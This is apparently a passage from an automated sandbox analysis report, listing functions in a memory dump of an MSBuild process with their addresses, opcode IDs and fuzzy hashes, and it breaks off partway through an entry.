                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a4273395e7ae66859192ab07b3ff963c9c9db5bb9228738ac1ba9031081b724e
                                                                                                                                                                                                                                                                  • Instruction ID: 529fe726bbddcf9c00fa4adc391fb2496717c036ca5f599dbff799f38a969584
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4273395e7ae66859192ab07b3ff963c9c9db5bb9228738ac1ba9031081b724e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80218175A00209DFCB14DF58C581AAEBBF5FB88318F6441ADD505A7311CB71AE06CBD0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01379240 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 863063c5200fe5072ac4ce12669ba73685ea64eaa8cca0170f5e5e3dcd47eb49
                                                                                                                                                                                                                                                                  • Instruction ID: de3abe9db0c6725aba834f6ac9b250e72b6698d11aa5c229c1157172cdb16fb1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 863063c5200fe5072ac4ce12669ba73685ea64eaa8cca0170f5e5e3dcd47eb49
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8611347B010605AEE7319F19E900A7277E9FB64B98F518025E80497368D334DD01DF60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144FF09 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3702807f1e7d1bc6636f97c27bd5ad4fb04663b474cf674a82ddabe744135da7
                                                                                                                                                                                                                                                                  • Instruction ID: b72cfe83d048ebb72940a1ef065c64abb22870d0bf0354dde9fa2b68d6aec0f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3702807f1e7d1bc6636f97c27bd5ad4fb04663b474cf674a82ddabe744135da7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 082183B16102059FD754CF29E980B52BBE4FB4C314B4985BAE90CCF656E370E844CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AB052 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 343fc447874d20bb17386a58b7cf9f3b9b3e33c697a4e725a9eaa22668fbe70f
                                                                                                                                                                                                                                                                  • Instruction ID: 1fb02b17b9c9c200f308e08d00dce041f08a565055c54ffe8ef70f581178dbc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 343fc447874d20bb17386a58b7cf9f3b9b3e33c697a4e725a9eaa22668fbe70f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7301D672740705ABE720AB7E9C84FABBBE8DF9561CF440029E70597141DB70E9008621
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01377330 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 50deb49ecc5bc51258fe2dc300b71b6e14d149e22c18c7219cd99aa7ed9f25fc
                                                                                                                                                                                                                                                                  • Instruction ID: adf600de41b1aa751cf09b3a91570d24577f0184c203955734649e1ca56d2b16
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50deb49ecc5bc51258fe2dc300b71b6e14d149e22c18c7219cd99aa7ed9f25fc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D11C271600705DFE721CF59C84ABAB77E8EF44318F054829EA95CB251D739EC40CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AE53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                                                                  • Instruction ID: e85b3ab255ad709613611e67ede028d2fc8f29234164e0dd7d2926c5964305bb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11E5722057D6DBEB23972CD958B253BDCEB0174CF1900F0EE818BA82F368C842C650
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AF2D0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c79d86dc269217b7cf348f8d379372e44940ae531bd3f9d9e62bd5d45bf191c1
                                                                                                                                                                                                                                                                  • Instruction ID: 8669e1375bba0b39c2c7e93d85954864b9d9ea757ec517c5a0ada27856c21956
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c79d86dc269217b7cf348f8d379372e44940ae531bd3f9d9e62bd5d45bf191c1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B511CE726006499BCB20DF6DC884BAEB7A8FF44708F54007AEA01EB692DA39D901C750
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014172A0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                                                                                                                  • Instruction ID: dba76c04ea22f9dd597ad60afe1c77ec79f399e25715de46e6f8ef70c58ef307
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2701B57224050ABFEB15AF6ACC80E93FB6DFF64795B40052AF25442570CB31ACA1CBA4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137A250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                                                                  • Instruction ID: f6e667cdb64c6466756d596d9211ba08301141082cb39a7eb4915fd46539b658
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D0149314057259BCB318F19D840A7A7BF8FF55B64704892DFC958B681D33AD800CB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013FE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4f22a65e82017c844f4486679b905c9a8df709f1c8e506e1a802bc13d103398b
                                                                                                                                                                                                                                                                  • Instruction ID: ce55333e48faf0657892b45adbacde008c2dc1e2b327c71e1972dab930af61bf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f22a65e82017c844f4486679b905c9a8df709f1c8e506e1a802bc13d103398b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9118B36241641EFDB25AF19C980F56BBB8FF54B48F210079EA059B661D235ED01CA90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01386259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 46088121a467a3b8193a88bba6de5a6914b285e515207820f8da6b96c93d1229
                                                                                                                                                                                                                                                                  • Instruction ID: 0ae5fada9b902ec2ba03e0d09cc49661f4013d3d8b74c862a6f95900bb6da1d4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46088121a467a3b8193a88bba6de5a6914b285e515207820f8da6b96c93d1229
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 381130B1641229ABEF25EB68CD42FE97374BF04718F5041D8A319A61E0DB709E85CF84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01406050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6f5200135ace98c5fb8356273d8e8ba2a3f964151577e2dff22dd9f3de05a20a
                                                                                                                                                                                                                                                                  • Instruction ID: 047cdc5089e258db070bc392c350b29876ecb68010993b8b6e4bf9a8deb7363a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5200135ace98c5fb8356273d8e8ba2a3f964151577e2dff22dd9f3de05a20a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 091117B2900019ABCF12DB99CC80DDFBB7CEF48258F054166A906A7211EA34AA55CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                                  • Instruction ID: a0b31ebd71bcecff6ec5612fe38c753513939be2252963c8230bc988f1230bb2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 100128736002008BDF15AB6DD8C0B53776BBFC4708F5A41A5ED028F256EA71CC82C390
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                                  • Instruction ID: 4bb6b869372a4545c173285eb3fccbec5a1f0f15873b0f0316f2590a4d945240
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0701F532100706DFEB3396AEE800EA777EEFFC5218F444419EA468B980EA74E401C790
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C20F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e53d85b064bf9c3d73d2eb05d6143e28cd944ebe7fb6975744cc66dd4d38d1ad
                                                                                                                                                                                                                                                                  • Instruction ID: c19c5b0c43bb6d12e29e966c06f5a28f6e56127fed2cb7af5246f632b8462365
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e53d85b064bf9c3d73d2eb05d6143e28cd944ebe7fb6975744cc66dd4d38d1ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75116D75A0020DABDF05DF68C850EAE7BB9EB84648F00405DEA059B290D635AE11CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BE5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 82f090143684e71ed92a1ad5e3735cf790a28ebde6fb7d7423cc144c19e57687
                                                                                                                                                                                                                                                                  • Instruction ID: 178bf7b028b75086faa3bc9baa98c04f6fa2e803a9d69618af0fd92c41add2d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82f090143684e71ed92a1ad5e3735cf790a28ebde6fb7d7423cc144c19e57687
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 320184B1202E46BBDB11AB7ECD80E57B7ACFB54668701052AB20993561DB24EC01CAA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01379353 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                                                                                                  • Instruction ID: f770c701e474a72010774363c33d838fee226477af20aa40e31142058946da25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF118B72410A02DFEB329E19C880B22B7E4BF5077AF15896DE4894A4A6C378E880CB10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BD1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                                                                                                  • Instruction ID: c78b4541c4343f6e6eb0dd92f4140560cfffb71f1faba6fdad070670ef7ddcfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5014772E0058C9BDB119B98E840FA577A9EB94A3CF10415AFF158FA81EB34DD00C780
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A33A5 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                                                                                                  • Instruction ID: cfba64c218b69fc20e23f11001243eb926134efbdf3b7590c392566e97025e11
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C01D136300105EBCB129AAECC40EDB7EACFF85758B144429BA06E7560EA34DD02C760
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F5BE Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 38e55b07c222f32b2608033f5b53f779fb263ab7a125e6f4a8ef8837b443c9a6
                                                                                                                                                                                                                                                                  • Instruction ID: 27e7a55030fb1f857aad11d5d00a0b51f8e60facb6db739c92d2912a894d3433
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38e55b07c222f32b2608033f5b53f779fb263ab7a125e6f4a8ef8837b443c9a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D015E71A00259ABDB14EF69D851FAEBBB8EF44704F00406AB904EB290D674DE05CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F453 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 295ab6c67c521fee34781a6f1197323228fb7fddb4f19b4cb95fc1ce9da795e4
                                                                                                                                                                                                                                                                  • Instruction ID: f0e269c45983fe0148a43e169aca8a18d92e3dc0d0c842dfe9846e9f4f2977d2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 295ab6c67c521fee34781a6f1197323228fb7fddb4f19b4cb95fc1ce9da795e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47019E71A10259ABCB04EF69D841FAEBBB8EF94714F00402AB900EB390D674DE01CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
